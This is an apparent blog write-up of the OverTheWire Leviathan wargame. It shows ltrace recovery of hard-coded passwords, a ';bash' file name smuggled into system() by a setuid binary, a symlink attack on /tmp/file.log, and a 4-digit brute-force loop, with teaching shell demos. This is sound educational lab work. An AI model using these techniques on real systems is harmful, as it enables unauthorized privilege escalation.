OverTheWire-Leviathan

Vighnesh Srinivas
6 min read, May 16, 2021

Hello People,

Today we will take a look at Leviathan at OverTheWire. This is an easy wargame that revolves around basic Linux commands and a handful of small setuid binaries, so it is a good place to apply everything we learned in Bandit. Let’s jump right in!

Level 0 -> Level 1

At Level 0, we SSH into the machine with the username “leviathan0” and the password “leviathan0”, using the command “ssh leviathan0@leviathan.labs.overthewire.org -p 2223”. The terminal prompts for the password and then gives us a shell. Unlike Bandit, this wargame gives no hints per level, so we are on our own. Let’s look around. “pwd” shows we are in the “/home/leviathan0” directory. “ls” shows nothing at all. Interesting. So we run “ls -la”, which also lists hidden (dot-prefixed) files and directories, and now we see a directory called “.backup”. We “cd” into it and find a “bookmarks.html” file. It is a long file, so rather than reading it all we search it for the word “pass” with “cat bookmarks.html | grep pass” (or simply “grep pass bookmarks.html”) and voila! One of the matching lines contains the password.

Password for leviathan1

Level 1 -> Level 2

We ssh in with leviathan1’s credentials using the same command as above with the new username. Listing the home directory with “ls” shows a file called “check”. With the default ls colours it is highlighted in red, which is how ls marks setuid executables; “ls -l” shows an “s” in place of the owner’s execute bit, and “file check” reports it as a setuid ELF binary. A setuid binary runs with the privileges of the file’s owner rather than those of the user who launches it, so when leviathan1 executes “check” it runs as the file’s owner, leviathan2 (not as root; a setuid binary is only root-privileged if root owns it). That is exactly why such binaries are the usual privilege-escalation vector in these games. Running “./check” prompts for a password. Entering leviathan1’s password gives “Wrong password”, so the binary expects some other secret and presumably does something useful once it gets it. Viewing the binary with “cat” only shows gibberish, since it is compiled code, so we use “ltrace”, which runs a program and prints every dynamic-library function it calls (strcmp, printf and so on) together with the arguments and return values; for system calls the equivalent tool is “strace”. Run “ltrace ./check”. At first only the first couple of lines appear, because the program has stopped to wait for our input; type anything and press enter and the rest of the trace appears. In it we see a “strcmp” call comparing what we typed with the string “sex”. Run “./check” again, enter that word at the password prompt and it is accepted: the binary drops us into a shell that is running as leviathan2. From there “cat /etc/leviathan_pass/leviathan2” gives us the password!

Password for leviathan2

Level 2 -> Level 3

On this level, we have another setuid binary called “printfile”. We run it and, as the name suggests, it prints the contents of the file whose path we pass as an argument.

Let’s try “./printfile /etc/leviathan_pass/leviathan3”. It refuses: we are not allowed to read that file. “./printfile /etc/passwd” works, since that file is readable by all users. So the binary can only print files we could already read ourselves. Let’s run it under “ltrace” to see how it decides.

The trace shows that the program first calls access() with our path to check whether we have permission to read it. It then passes our string, which is the file path, to snprintf(), which builds the command to be executed, “/bin/cat” followed by our path. That command string goes to system(), which hands it to /bin/sh to execute. This is a very basic understanding of what the program is doing; please read the man pages for access(2), snprintf(3) and system(3) to understand them better. Two details matter here. First, access() checks permissions against the real user ID, which is us, leviathan2; that is why the password file is refused. The shell started by system(), on the other hand, runs with the effective user ID of the setuid binary, leviathan3, which can read it. Second, access() treats the path as one literal string, but the shell that system() starts interprets it: it splits the command on spaces and treats “;” as a separator between commands. Anything we put in the file name is therefore checked as a file name but executed as shell syntax. So to get the password for leviathan3, we can do the following:

Password for leviathan3

Here we create a file in a directory we own (for example under /tmp) whose name ends in “;bash”, and pass its full path to printfile. access() sees a file that exists and is readable by us, so the check passes. But the shell runs “/bin/cat /tmp/…/file.txt” and then, after the “;”, the separate command “bash”. Since there is no proper validation of the file name, we are having system() execute multiple commands. Now, since this is a setuid binary, “bash” is started with leviathan3’s privileges, and we get a shell as leviathan3. We can now view the password file for the user. I’ll admit that this level was a bit challenging for me and I had to go around looking for some help since I’m also still learning.
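The following shell script is an added example and not the printfile binary itself: it re-creates the access()-then-system() pattern described above with plain shell functions, beside a version that passes the path to cat as a single argument instead of through a shell. The file name it uses injects “echo INJECTED” rather than “bash” so the result can be checked offline; the error message and the temporary directory are constructed for the example.

```shell
#!/bin/sh
# Added example: a shell re-creation of the flawed printfile pattern
# (check the path, then splice it unquoted into a shell command line).
# Not the real Leviathan binary; all names and messages are constructed.

# Vulnerable shape: an access()-style readability check on the whole
# argument, then "/bin/cat <arg>" built as a string and run by sh -c,
# which is what snprintf() followed by system() does.
vulnerable_printfile() {
  if [ ! -r "$1" ]; then
    echo "You cant have that file..."   # constructed message
    return 1
  fi
  sh -c "/bin/cat $1"                    # shell parses ';' and spaces in $1
}

# Hardened shape: same check, but the path is handed to cat as one argument,
# so ';', spaces and other metacharacters are never interpreted by a shell.
safe_printfile() {
  if [ ! -r "$1" ]; then
    echo "You cant have that file..."
    return 1
  fi
  /bin/cat -- "$1"
}

# Create a readable, empty file whose *name* ends in ";echo INJECTED", feed
# its path to the given function and print whatever the call wrote to stdout.
# The access check passes in both cases because the file really exists.
injection_demo() {
  fn=$1
  dir=$(mktemp -d)                        # constructed temp directory
  : > "$dir/file.txt;echo INJECTED"
  out=$("$fn" "$dir/file.txt;echo INJECTED" 2>/dev/null || true)
  rm -rf "$dir"
  printf '%s' "$out"
}

# vulnerable: cat fails on the truncated path, then the injected echo runs.
# safe: cat prints the (empty) file and nothing else.
injection_demo vulnerable_printfile; echo
injection_demo safe_printfile; echo
```

On the box the same idea is used with “;bash” in place of “;echo INJECTED”; the shell started by system() then runs that second command with the binary’s effective privileges.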

Level 3 -> Level 4

Here, in the home directory, there is a setuid binary with the name “level3”. We run it and it asks us for a password. leviathan3’s password does not work. Let’s run it under “ltrace” again and see what we get. It prompts for the password again; let’s enter the same wrong password.

In the trace we can see a “strcmp” comparing our input with the string “snlprintf”. We run the binary again, enter that as the password and it works! We get a shell as leviathan4 and can now view the password for leviathan4 in /etc/leviathan_pass.

Password for leviathan4

Level 4 -> Level 5

On running the “ls” command, no files or directories show up, so we list everything with “ls -la” and see a “.trash” directory. We move into it and find a setuid binary with the name “bin”. We execute it with “./bin” and it prints a line of binary digits, grouped eight bits at a time.

Each 8-bit group is one ASCII character, so this could well be the password for the next level converted to binary. Decoding it with any binary-to-ASCII converter, and voila! It gives us the password for leviathan5. Since the decoded string is a credential, it is better to decode it locally with a one-liner than to paste it into a web tool.
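As an added example (not part of the original post and not the decoder the author used), here is a POSIX sh function that turns a whitespace-separated list of 8-bit binary groups, like the output of “./bin”, into the ASCII string it encodes. The sample input at the bottom is constructed for the example; the real output of the level is not reproduced here.

```shell
#!/bin/sh
# Added example: decode "01001000 01101001 ..." into ASCII with plain sh,
# so the password never has to leave the box. Input is constructed.

# bin_to_ascii "<groups separated by spaces or newlines>"
# Prints the decoded string; returns 1 on a group that is not binary.
bin_to_ascii() {
  out=""
  for group in $1; do
    # Reject anything that is not a non-empty string of 0s and 1s.
    case $group in
      ""|*[!01]*) printf 'invalid binary group: %s\n' "$group" >&2; return 1 ;;
    esac
    # Convert the group to a number one bit at a time (no bash-only 2#... needed).
    n=0
    rest=$group
    while [ -n "$rest" ]; do
      bit=${rest%"${rest#?}"}   # first character of $rest
      rest=${rest#?}            # drop it
      n=$(( n * 2 + bit ))
    done
    # Append the character with that code via an octal escape: \110 -> 'H'.
    out="$out$(printf "\\$(printf '%03o' "$n")")"
  done
  printf '%s\n' "$out"
}

# Constructed sample, standing in for the output of ./bin.
bin_to_ascii "01001000 01101001 00100001"
```

The function accepts groups separated by spaces or newlines, so the output of the binary can be pasted in directly, or piped: bin_to_ascii "$(./bin)".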

Password for leviathan5

Level 5 -> Level 6

We can see there’s another setuid binary in the home directory with the name “leviathan5”. We run it and it prints the message “Cannot find /tmp/file.log”. So it wants to read that file. Let’s create it and see what happens.

We can create and write to this file, and on the next run the binary prints whatever we put in it. Copying the contents of “/etc/leviathan_pass/leviathan6” into it does not work, since we do not have permission to read that file. But the binary, running as leviathan6, does. So we delete our /tmp/file.log and replace it with a symbolic link to the password file (“ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log”). Now we run the binary again, it follows the link with its own privileges, and we see the password! Sweet! This is the classic symlink trick against privileged programs that open a path in a world-writable directory without checking what it points to.

Password for leviathan6

Level 6 -> Level 7

On this level, we have a setuid binary with the name “leviathan6” in the home directory. We run it and it asks us to supply a 4-digit code as its argument. There are only 10000 possibilities, so we brute force the binary to find the correct code.

We use the loop “for i in $(seq 0000 9999); do ./leviathan6 $i ; done”. Note that seq does not zero-pad its output unless given “-w”, so “seq -w 0 9999” is the safer form when the target expects exactly four characters. A long run of “Wrong” messages is displayed until the correct code is found, at which point the binary gives us a shell. We run “whoami” and see that we are leviathan7, and we can now retrieve the user’s password. (When we exit that shell the loop simply carries on through the remaining codes, which is harmless.)
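To show the loop in a form that stops at the first hit, here is an added example (not the author’s one-liner and not the level binary): a brute-force function run against a constructed stand-in for “./leviathan6” that merely returns success on one hard-coded value, 7331, chosen for the example. The real binary drops you into a shell instead of returning, so on the box you would still run it in the foreground as shown in the post.

```shell
#!/bin/sh
# Added example: brute-force a 4-digit code with zero-padded guesses and
# stop at the first success. The checker below is a constructed stand-in
# for ./leviathan6; its accepted value (7331) is made up for this example.

# Stand-in for the level binary: exit 0 only for the right code.
fake_leviathan6() {
  if [ "$1" = "7331" ]; then
    echo "Correct"
    return 0
  fi
  echo "Wrong"
  return 1
}

# brute_force_pin <checker-command>
# Tries 0000..9999 (seq -w pads every guess to four digits), prints the
# first code the checker accepts and returns 0; returns 1 if none is accepted.
brute_force_pin() {
  checker=$1
  for code in $(seq -w 0 9999); do
    if "$checker" "$code" >/dev/null 2>&1; then
      printf '%s\n' "$code"
      return 0
    fi
  done
  return 1
}

brute_force_pin fake_leviathan6
```

Against the real binary, replace fake_leviathan6 with ./leviathan6 and drop the output redirection so the shell it spawns on success stays attached to your terminal.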

Password for leviathan7

Level 7

We can log in with leviathan7’s credentials and the home directory holds a congratulations message.

We have successfully completed the wargame. Congratulations!


Vighnesh Srinivas

A Cybersecurity enthusiast looking to make his career in offensive security.